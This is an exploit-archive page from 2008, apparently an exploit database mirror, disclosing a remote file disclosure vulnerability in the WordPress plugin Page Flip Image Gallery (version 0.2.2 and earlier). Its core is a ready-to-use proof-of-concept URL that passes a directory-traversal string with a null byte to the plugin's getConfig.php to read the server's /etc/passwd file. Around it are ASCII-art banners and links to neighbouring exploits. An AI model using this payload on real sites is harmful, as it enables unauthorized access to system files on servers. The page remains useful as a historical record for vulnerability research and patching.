[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Wordpress Plugin Page Flip Image Gallery <= 0.2.2 Remote FD Vuln
# Published : 2008-12-22
# Author : GoLd_M
# Previous Title : Text Lines Rearrange Script (filename) File Disclosure Vulnerability
# Next Title : Pligg 9.9.5b (check_url.php url) Upload Shell/SQL Injection Exploit
_____ ____ __ __ _ ____ ____ ____
|_ _| | _ / / / / ___| / ___| / ___|
| | | |_) | V / / _ | | _ | | | |
| | | _ < | | / ___ | |_| | _ | |___ | |___
|_| |_| _ |_| /_/ _ ____| (_) ____| ____|
Wordpress Plugin Page Flip Image Gallery <= 0.2.2 Remote File Disclosure Vulnerability
D : http://downloads.wordpress.org/plugin/page-flip-image-gallery.0.2.2.zip
Poc :
/wp-content/plugins/page-flip-image-gallery/books/getConfig.php?book_id=../../../../../../../../../../../etc/passwd%00123
____ _ _ __ __
/ ___| ___ | | __| | | / |
| | _ / _ | | / _` | | |/| |
| |_| | | (_) | | |___ | (_| | | | | |
____| ___/ |_____| __,_| _____ |_| |_|
|_____|
# www.Syue.com [2008-12-22]